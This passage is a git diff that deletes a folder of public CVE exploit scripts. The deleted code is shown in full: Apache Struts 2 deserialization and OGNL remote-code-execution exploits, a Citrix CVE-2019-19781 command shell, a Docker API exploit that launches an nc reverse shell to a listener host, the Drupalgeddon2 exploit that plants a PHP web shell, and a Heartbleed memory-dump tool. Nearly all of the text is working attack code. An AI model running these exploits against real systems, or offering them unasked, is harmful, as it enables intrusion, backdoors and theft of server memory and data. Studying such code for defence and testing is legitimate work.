-AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
-AAoAAQACABYAEAAJ</byte-array>
-                          </__bytecodes>
-                          <__transletIndex>-1</__transletIndex>
-                          <__indentNumber>0</__indentNumber>
-                        </default>
-                        <boolean>false</boolean>
-                      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
-                    </next>
-                  </iter>
-                  <filter class="javax.imageio.ImageIO$ContainsFilter">
-                    <method>
-                      <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
-                      <name>newTransformer</name>
-                      <parameter-types/>
-                    </method>
-                    <name>foo</name>
-                  </filter>
-                  <next class="string">foo</next>
-                </serviceIterator>
-                <lock/>
-              </cipher>
-              <input class="java.lang.ProcessBuilder$NullInputStream"/>
-              <ibuffer/>
-              <done>false</done>
-              <ostart>0</ostart>
-              <ofinish>0</ofinish>
-              <closed>false</closed>
-            </is>
-            <consumed>false</consumed>
-          </dataSource>
-          <transferFlavors/>
-        </dataHandler>
-        <dataLen>0</dataLen>
-      </value>
-    </jdk.nashorn.internal.objects.NativeString>
-    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
-  </entry>
-  <entry>
-    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
-    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
-  </entry>
-</map>
-"""
-    headers = {
-        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
-        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
-        'Referer': str(url),
-        'Content-Type': 'application/xml',
-        'Accept': '*/*'
-    }
-
-    timeout = 8
-    try:
-        requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
-        # if the response returned before the request timeout.
-        # then, the host should not be vulnerable.
-        # The request should return > 10 seconds, while the timeout is 8.
-        result = False
-    except Exception:
-        result = True
-    return(result)
-
-
-def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
-    if url:
-        if not do_exploit:
-            result = check(url)
-            output = '[*] Status: '
-            if result is True:
-                output += 'Vulnerable!'
-            else:
-                output += 'Not Affected.'
-            print(output)
-        else:
-            exploit(url, cmd)
-            print("[$] Request sent.")
-            print("[.] If the host is vulnerable, the command will be executed in the background.")
-
-    if usedlist:
-        URLs_List = []
-        try:
-            f_file = open(str(usedlist), 'r')
-            URLs_List = f_file.read().replace('\r', '').split('\n')
-            try:
-                URLs_List.remove('')
-            except ValueError:
-                pass
-            f_file.close()
-        except Exception as e:
-            print('Error: There was an error in reading list file.')
-            print("Exception: " + str(e))
-            exit(1)
-        for url in URLs_List:
-            if not do_exploit:
-                result = check(url)
-                output = '[*] Status: '
-                if result is True:
-                    output += 'Vulnerable!'
-                else:
-                    output += 'Not Affected.'
-                print(output)
-            else:
-                exploit(url, cmd)
-                print("[$] Request sent.")
-                print("[.] If the host is vulnerable, the command will be executed in the background.")
-
-    print('[%] Done.')
-
-if __name__ == '__main__':
-    try:
-        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
-    except KeyboardInterrupt:
-        print('\nKeyboardInterrupt Detected.')
-        print('Exiting...')
-        exit(0)
diff --git a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py
deleted file mode 100644
index 7fb1174..0000000
--- a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py	
+++ /dev/null
@@ -1,231 +0,0 @@
-#!/usr/bin/env python3
-# coding=utf-8
-# *****************************************************
-# struts-pwn: Apache Struts CVE-2018-11776 Exploit
-# Author:
-# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
-# This code uses a payload from:
-# https://github.com/jas502n/St2-057
-# *****************************************************
-
-from __future__ import print_function
-from future import standard_library
-standard_library.install_aliases()
-from builtins import str
-from builtins import range
-import argparse
-import random
-import requests
-import sys
-try:
-    from urllib import parse as urlparse
-except ImportError:
-    import urllib.parse
-
-# Disable SSL warnings
-try:
-    import requests.packages.urllib3
-    requests.packages.urllib3.disable_warnings()
-except Exception:
-    pass
-
-if len(sys.argv) <= 1:
-    print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
-    print('[*] Struts-PWN - @mazen160')
-    print('\n%s -h for help.' % (sys.argv[0]))
-    exit(0)
-
-
-parser = argparse.ArgumentParser()
-parser.add_argument("-u", "--url",
-                    dest="url",
-                    help="Check a single URL.",
-                    action='store')
-parser.add_argument("-l", "--list",
-                    dest="usedlist",
-                    help="Check a list of URLs.",
-                    action='store')
-parser.add_argument("-c", "--cmd",
-                    dest="cmd",
-                    help="Command to execute. (Default: 'id')",
-                    action='store',
-                    default='id')
-parser.add_argument("--exploit",
-                    dest="do_exploit",
-                    help="Exploit.",
-                    action='store_true')
-
-
-args = parser.parse_args()
-url = args.url if args.url else None
-usedlist = args.usedlist if args.usedlist else None
-cmd = args.cmd if args.cmd else None
-do_exploit = args.do_exploit if args.do_exploit else None
-
-headers = {
-    'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
-    # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
-    'Accept': '*/*'
-}
-timeout = 3
-
-
-def parse_url(url):
-    """
-    Parses the URL.
-    """
-
-    # url: http://example.com/demo/struts2-showcase/index.action
-
-    url = url.replace('#', '%23')
-    url = url.replace(' ', '%20')
-
-    if ('://' not in url):
-        url = str("http://") + str(url)
-    scheme = urllib.parse.urlparse(url).scheme
-
-    # Site: http://example.com
-    site = scheme + '://' + urllib.parse.urlparse(url).netloc
-
-    # FilePath: /demo/struts2-showcase/index.action
-    file_path = urllib.parse.urlparse(url).path
-    if (file_path == ''):
-        file_path = '/'
-
-    # Filename: index.action
-    try:
-        filename = url.split('/')[-1]
-    except IndexError:
-        filename = ''
-
-    # File Dir: /demo/struts2-showcase/
-    file_dir = file_path.rstrip(filename)
-    if (file_dir == ''):
-        file_dir = '/'
-
-    return({"site": site,
-            "file_dir": file_dir,
-            "filename": filename})
-
-
-def build_injection_inputs(url):
-    """
-    Builds injection inputs for the check.
-    """
-
-    parsed_url = parse_url(url)
-    injection_inputs = []
-    url_directories = parsed_url["file_dir"].split("/")
-
-    try:
-        url_directories.remove("")
-    except ValueError:
-        pass
-
-    for i in range(len(url_directories)):
-        injection_entry = "/".join(url_directories[:i])
-
-        if not injection_entry.startswith("/"):
-            injection_entry = "/%s" % (injection_entry)
-
-        if not injection_entry.endswith("/"):
-            injection_entry = "%s/" % (injection_entry)
-
-        injection_entry += "{{INJECTION_POINT}}/"  # It will be renderred later with the payload.
-        injection_entry += parsed_url["filename"]
-
-        injection_inputs.append(injection_entry)
-
-    return(injection_inputs)
-
-
-def check(url):
-    random_value = int(''.join(random.choice('0123456789') for i in range(2)))
-    multiplication_value = random_value * random_value
-    injection_points = build_injection_inputs(url)
-    parsed_url = parse_url(url)
-    print("[%] Checking for CVE-2018-11776")
-    print("[*] URL: %s" % (url))
-    print("[*] Total of Attempts: (%s)" % (len(injection_points)))
-    attempts_counter = 0
-
-    for injection_point in injection_points:
-        attempts_counter += 1
-        print("[%s/%s]" % (attempts_counter, len(injection_points)))
-        testing_url = "%s%s" % (parsed_url["site"], injection_point)
-        testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
-        try:
-            resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
-        except Exception as e:
-            print("EXCEPTION::::--> " + str(e))
-            continue
-        if "Location" in list(resp.headers.keys()):
-            if str(multiplication_value) in resp.headers['Location']:
-                print("[*] Status: Vulnerable!")
-                return(injection_point)
-    print("[*] Status: Not Affected.")
-    return(None)
-
-
-def exploit(url, cmd):
-    parsed_url = parse_url(url)
-
-    injection_point = check(url)
-    if injection_point is None:
-        print("[%] Target is not vulnerable.")
-        return(0)
-    print("[%] Exploiting...")
-
-    payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
-
-    testing_url = "%s%s" % (parsed_url["site"], injection_point)
-    testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
-
-    try:
-        resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
-    except Exception as e:
-        print("EXCEPTION::::--> " + str(e))
-        return(1)
-
-    print("[%] Response:")
-    print(resp.text)
-    return(0)
-
-
-def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
-    if url:
-        if not do_exploit:
-            check(url)
-        else:
-            exploit(url, cmd)
-
-    if usedlist:
-        URLs_List = []
-        try:
-            f_file = open(str(usedlist), "r")
-            URLs_List = f_file.read().replace("\r", "").split("\n")
-            try:
-                URLs_List.remove("")
-            except ValueError:
-                pass
-            f_file.close()
-        except Exception as e:
-            print("Error: There was an error in reading list file.")
-            print("Exception: " + str(e))
-            exit(1)
-        for url in URLs_List:
-            if not do_exploit:
-                check(url)
-            else:
-                exploit(url, cmd)
-
-    print("[%] Done.")
-
-
-if __name__ == "__main__":
-    try:
-        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
-    except KeyboardInterrupt:
-        print("\nKeyboardInterrupt Detected.")
-        print("Exiting...")
-        exit(0)
diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py
deleted file mode 100644
index a6d4044..0000000
--- a/CVE Exploits/Citrix CVE-2019-19781.py	
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/usr/bin/env python
-# https://github.com/mpgn/CVE-2019-19781
-# # #
-
-import requests
-import string
-import random
-import re
-import sys
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
-print("Found by Mikhail Klyuchnikov")
-print("")
-
-if len(sys.argv) < 2:
-  print("[-] No URL provided")
-  sys.exit(0)
-
-while True:
-    try:
-      command = input("command > ")
-
-      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
-      print("[+] Adding bookmark", random_xml + ".xml")
-
-      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
-      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
-                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
-      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
-      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
-
-      if r.status_code == 200:
-        print("[+] Bookmark added")
-      else:
-        print("\n[-] Target not vulnerable or something went wrong")
-        sys.exit(0)
-
-      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
-      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
-                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
-      r = requests.get(burp0_url, headers=burp0_headers,verify=False)
-
-      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
-      print("[+] Result of the command: \n")
-      print(replaced)
-
-    except KeyboardInterrupt:
-            print("Exiting...")
-            break
\ No newline at end of file
diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py
deleted file mode 100644
index 8880a16..0000000
--- a/CVE Exploits/Docker API RCE.py	
+++ /dev/null
@@ -1,49 +0,0 @@
-from __future__ import print_function
-import requests
-import logging
-import json
-import urllib.parse
-
-# NOTE
-# Enable Remote API with the following command
-# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
-# This is an intended feature, remember to filter the port 2375..
-
-name          = "docker"
-description   = "Docker RCE via Open Docker API on port 2375"
-author        = "Swissky"
-
-# Step 1 - Extract id and name from each container
-ip   = "127.0.0.1"
-port = "2375"
-data = "containers/json"
-url  = "http://{}:{}/{}".format(ip, port, data)
-r = requests.get(url)
-
-if r.json:
-    for container in r.json():
-        container_id   = container['Id']
-        container_name = container['Names'][0].replace('/','')
-        print((container_id, container_name))
-
-        # Step 2 - Prepare command
-        cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
-        data = "containers/{}/exec".format(container_name)
-        url = "http://{}:{}/{}".format(ip, port, data)
-        post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
-        post_header = {
-            "Content-Type": "application/json"
-        }
-        r = requests.post(url, json=json.loads(post_json))
-
-
-        # Step 3 - Execute command
-        id_cmd = r.json()['Id']
-        data = "exec/{}/start".format(id_cmd)
-        url = "http://{}:{}/{}".format(ip, port, data)
-        post_json = '{ "Detach":false,"Tty":false}'
-        post_header = {
-            "Content-Type": "application/json"
-        }
-        r = requests.post(url, json=json.loads(post_json))
-        print(r)
\ No newline at end of file
diff --git a/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb b/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb
deleted file mode 100644
index d32a654..0000000
--- a/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb	
+++ /dev/null
@@ -1,308 +0,0 @@
-#!/usr/bin/env ruby
-#
-# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
-#
-# Authors:
-# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
-# - g0tmi1k   ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
-#
-
-
-require 'base64'
-require 'json'
-require 'net/http'
-require 'openssl'
-require 'readline'
-
-
-# Settings - Proxy information (nil to disable)
-proxy_addr = nil
-proxy_port = 8080
-
-
-# Settings - General
-$useragent = "drupalgeddon2"
-webshell = "s.php"
-writeshell = true
-
-
-# Settings - Payload (we could just be happy without this, but we can do better!)
-#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
-bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
-bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-# Function http_post <url> [post]
-def http_post(url, payload="")
-  uri = URI(url)
-  request = Net::HTTP::Post.new(uri.request_uri)
-  request.initialize_http_header({"User-Agent" => $useragent})
-  request.body = payload
-  return $http.request(request)
-end
-
-
-# Function gen_evil_url <cmd>
-def gen_evil_url(evil, feedback=true)
-  # PHP function to use (don't forget about disabled functions...)
-  phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
-
-  #puts "[*] PHP cmd: #{phpmethod}" if feedback
-  puts "[*] Payload: #{evil}" if feedback
-
-  ## Check the version to match the payload
-  # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
-  if $drupalverion.start_with?('8')
-    # Method #1 - Drupal 8, mail, #post_render - response is 200
-    url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
-
-    # Method #2 - Drupal 8,  timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
-    #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
-  elsif $drupalverion.start_with?('7')
-    # Method #3 - Drupal 7, name, #post_render - response is 200
-    url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
-    payload = "form_id=user_pass&_triggering_element_name=name"
-  else
-    puts "[!] Unsupported Drupal version"
-    exit
-  end
-
-  # Drupal v7 needs an extra value from a form
-  if $drupalverion.start_with?('7')
-    response = http_post(url, payload)
-
-    form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
-    puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
-
-    #url = $target + "file/ajax/name/%23value/" + form_build_id
-    url = $target + "?q=file/ajax/name/%23value/" + form_build_id
-    payload = "form_build_id=" + form_build_id
-  end
-
-  return url, payload
-end
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-# Quick how to use
-if ARGV.empty?
-  puts "Usage: ruby drupalggedon2.rb <target>"
-  puts "       ruby drupalgeddon2.rb https://example.com"
-  exit
-end
-# Read in values
-$target = ARGV[0]
-
-
-# Check input for protocol
-if not $target.start_with?('http')
-  $target = "http://#{$target}"
-end
-# Check input for the end
-if not $target.end_with?('/')
-  $target += "/"
-end
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-# Banner
-puts "[*] --==[::#Drupalggedon2::]==--"
-puts "-"*80
-puts "[*] Target : #{$target}"
-puts "[*] Write? : Skipping writing web shell" if not writeshell
-puts "-"*80
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-# Setup connection
-uri = URI($target)
-$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-
-
-# Use SSL/TLS if needed
-if uri.scheme == "https"
-  $http.use_ssl = true
-  $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
-end
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-# Try and get version
-$drupalverion = nil
-# Possible URLs
-url = [
-  $target + "CHANGELOG.txt",
-  $target + "core/CHANGELOG.txt",
-  $target + "includes/bootstrap.inc",
-  $target + "core/includes/bootstrap.inc",
-]
-# Check all
-url.each do|uri|
-  # Check response
-  response = http_post(uri)
-
-  if response.code == "200"
-    puts "[+] Found  : #{uri} (#{response.code})"
-
-    # Patched already?
-    puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
-
-    # Try and get version from the file contents
-    $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
-
-    # If not, try and get it from the URL
-    $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
-
-    # Done!
-    break
-  elsif response.code == "403"
-    puts "[+] Found  : #{uri} (#{response.code})"
-
-    # Get version from URL
-    $drupalverion = uri.match(/core/)? "8.x" : "7.x"
-  else
-    puts "[!] MISSING: #{uri} (#{response.code})"
-  end
-end
-
-
-# Feedback
-if $drupalverion
-  status = $drupalverion.end_with?('x')? "?" : "!"
-  puts "[+] Drupal#{status}: #{$drupalverion}"
-else
-  puts "[!] Didn't detect Drupal version"
-  puts "[!] Forcing Drupal v8.x attack"
-  $drupalverion = "8.x"
-end
-puts "-"*80
-
-
-
-# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
-
-
-# Make a request, testing code execution
-puts "[*] Testing: Code Execution"
-# Generate a random string to see if we can echo it
-random = (0...8).map { (65 + rand(26)).chr }.join
-url, payload = gen_evil_url("echo #{random}")
-response = http_post(url, payload)
-if response.code == "200" and not response.body.empty?
-  #result = JSON.pretty_generate(JSON[response.body])
-  result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
-  puts "[+] Result : #{result}"
-
-  puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
-else
-  puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
-  exit
-end
-puts "-"*80
-
-
-# Location of web shell & used to signal if using PHP shell
-webshellpath = nil
-prompt = "drupalgeddon2"
-# Possibles paths to try
-paths = [
-  "./",
-  "./sites/default/",
-  "./sites/default/files/",
-]
-# Check all
-paths.each do|path|
-  puts "[*] Testing: File Write To Web Root (#{path})"
-
-  # Merge locations
-  webshellpath = "#{path}#{webshell}"
-
-  # Final command to execute
-  cmd = "#{bashcmd} | tee #{webshellpath}"
-
-  # Generate evil URLs
-  url, payload = gen_evil_url(cmd)
-  # Make the request
-  response = http_post(url, payload)
-  # Check result
-  if response.code == "200" and not response.body.empty?
-    # Feedback
-    #result = JSON.pretty_generate(JSON[response.body])
-    result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
-    puts "[+] Result : #{result}"
-
-    # Test to see if backdoor is there (if we managed to write it)
-    response = http_post("#{$target}#{webshellpath}", "c=hostname")
-    if response.code == "200" and not response.body.empty?
-      puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
-      break
-    else
-      puts "[!] Target is NOT exploitable. No write access here!"
-    end
-  else
-    puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
-  end
-  webshellpath = nil
-end if writeshell
-puts "-"*80 if writeshell
-
-if webshellpath
-  # Get hostname for the prompt
-  prompt = response.body.to_s.strip
-
-  # Feedback
-  puts "[*] Fake shell:   curl '#{$target}#{webshell}' -d 'c=whoami'"
-elsif writeshell
-  puts "[!] FAILED: Coudn't find writeable web path"
-  puts "[*] Dropping back direct commands (expect an ugly shell!)"
-end
-
-
-# Stop any CTRL + C action ;)
-trap("INT", "SIG_IGN")
-
-
-# Forever loop
-loop do
-  # Default value
-  result = "ERROR"
-
-  # Get input
-  command = Readline.readline("#{prompt}>> ", true).to_s
-
-  # Exit
-  break if command =~ /exit/
-
-  # Blank link?
-  next if command.empty?
-
-  # If PHP shell
-  if webshellpath
-    # Send request
-    result = http_post("#{$target}#{webshell}", "c=#{command}").body
-  # Direct commands
-  else
-    url, payload = gen_evil_url(command, false)
-    response = http_post(url, payload)
-    if response.code == "200" and not response.body.empty?
-      result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
-    end
-  end
-
-  # Feedback
-  puts result
-end
diff --git a/CVE Exploits/Heartbleed CVE-2014-0160.py b/CVE Exploits/Heartbleed CVE-2014-0160.py
deleted file mode 100644
index 42907c1..0000000
--- a/CVE Exploits/Heartbleed CVE-2014-0160.py	
+++ /dev/null
@@ -1,216 +0,0 @@
-#!/usr/bin/python
-
-# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
-# The author disclaims copyright to this source code.
-# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
-
-from __future__ import print_function
-from builtins import str
-from builtins import range
-import sys
-import struct
-import socket
-import time
-import select
-import re
-from optparse import OptionParser
-import smtplib
-
-options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
-options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
-options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
-options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
-options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
-options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')
-
-def h2bin(x):
-	return x.replace(' ', '').replace('\n', '').decode('hex')
-
-hello = h2bin('''
-16 03 02 00  dc 01 00 00 d8 03 02 53
-43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
-bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
-00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
-00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
-c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
-c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
-c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
-c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
-00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
-03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
-00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
-00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
-00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
-00 0f 00 01 01
-''')
-
-hbv10 = h2bin('''
-18 03 01 00 03
-01 40 00
-''')
-
-hbv11 = h2bin('''
-18 03 02 00 03
-01 40 00
-''')
-
-hbv12 = h2bin('''
-18 03 03 00 03
-01 40 00
-''')
-
-def hexdump(s, dumpf, quiet):
-	dump = open(dumpf,'a')
-	dump.write(s)
-	dump.close()
-	if quiet: return
-	for b in range(0, len(s), 16):
-		lin = [c for c in s[b : b + 16]]
-		hxdat = ' '.join('%02X' % ord(c) for c in lin)
-		pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
-		print('  %04x: %-48s %s' % (b, hxdat, pdat))
-	print()
-
-def recvall(s, length, timeout=5):
-	endtime = time.time() + timeout
-	rdata = ''
-	remain = length
-	while remain > 0:
-		rtime = endtime - time.time()
-		if rtime < 0:
-			if not rdata:
-				return None
-			else:
-				return rdata
-		r, w, e = select.select([s], [], [], 5)
-		if s in r:
-			data = s.recv(remain)
-			# EOF?
-			if not data:
-				return None
-			rdata += data
-			remain -= len(data)
-	return rdata
-
-def recvmsg(s):
-	hdr = recvall(s, 5)
-	if hdr is None:
-		print('Unexpected EOF receiving record header - server closed connection')
-		return None, None, None
-	typ, ver, ln = struct.unpack('>BHH', hdr)
-	pay = recvall(s, ln, 10)
-	if pay is None:
-		print('Unexpected EOF receiving record payload - server closed connection')
-		return None, None, None
-	print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
-	return typ, ver, pay
-
-def hit_hb(s, dumpf, host, quiet):
-	while True:
-		typ, ver, pay = recvmsg(s)
-		if typ is None:
-			print('No heartbeat response received from '+host+', server likely not vulnerable')
-			return False
-
-		if typ == 24:
-			if not quiet: print('Received heartbeat response:')
-			hexdump(pay, dumpf, quiet)
-			if len(pay) > 3:
-				print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
-			else:
-				print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
-			return True
-
-		if typ == 21:
-			if not quiet: print('Received alert:')
-			hexdump(pay, dumpf, quiet)
-			print('Server '+ host +' returned error, likely not vulnerable')
-			return False
-
-def connect(host, port, quiet):
-	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	if not quiet: print('Connecting...')
-	sys.stdout.flush()
-	s.connect((host, port))
-	return s
-
-def tls(s, quiet):
-	if not quiet: print('Sending Client Hello...')
-	sys.stdout.flush()
-	s.send(hello)
-	if not quiet: print('Waiting for Server Hello...')
-	sys.stdout.flush()
-
-def parseresp(s):
-	while True:
-		typ, ver, pay = recvmsg(s)
-		if typ == None:
-			print('Server closed connection without sending Server Hello.')
-			return 0
-		# Look for server hello done message.
-		if typ == 22 and ord(pay[0]) == 0x0E:
-			return ver
-
-def check(host, port, dumpf, quiet, starttls):
-	response = False
-	if starttls:
-		try:
-			s = smtplib.SMTP(host=host,port=port)
-			s.ehlo()
-			s.starttls()
-		except smtplib.SMTPException:
-			print('STARTTLS not supported...')
-			s.quit()
-			return False
-		print('STARTTLS supported...')
-		s.quit()
-		s = connect(host, port, quiet)
-		s.settimeout(1)
-		try:
-			re = s.recv(1024)
-			s.send('ehlo starttlstest\r\n')
-			re = s.recv(1024)
-			s.send('starttls\r\n')
-			re = s.recv(1024)
-		except socket.timeout:
-			print('Timeout issues, going ahead anyway, but it is probably broken ...')
-		tls(s,quiet)
-	else:
-		s = connect(host, port, quiet)
-		tls(s,quiet)
-
-	version = parseresp(s)
-
-	if version == 0:
-		if not quiet: print("Got an error while parsing the response, bailing ...")
-		return False
-	else:
-		version = version - 0x0300
-		if not quiet: print("Server TLS version was 1.%d\n" % version)
-
-	if not quiet: print('Sending heartbeat request...')
-	sys.stdout.flush()
-	if (version == 1):
-		s.send(hbv10)
-		response = hit_hb(s,dumpf, host, quiet)
-	if (version == 2):
-		s.send(hbv11)
-		response = hit_hb(s,dumpf, host, quiet)
-	if (version == 3):
-		s.send(hbv12)
-		response = hit_hb(s,dumpf, host, quiet)
-	s.close()
-	return response
-
-def main():
-	opts, args = options.parse_args()
-	if len(args) < 1:
-		options.print_help()
-		return
-
-	print('Scanning ' + args[0] + ' on port ' + str(opts.port))
-	for i in range(0,opts.num):
-		check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
-
-if __name__ == '__main__':
-	main()
diff --git a/CVE Exploits/JBoss CVE-2015-7501.py b/CVE Exploits/JBoss CVE-2015-7501.py
deleted file mode 100644
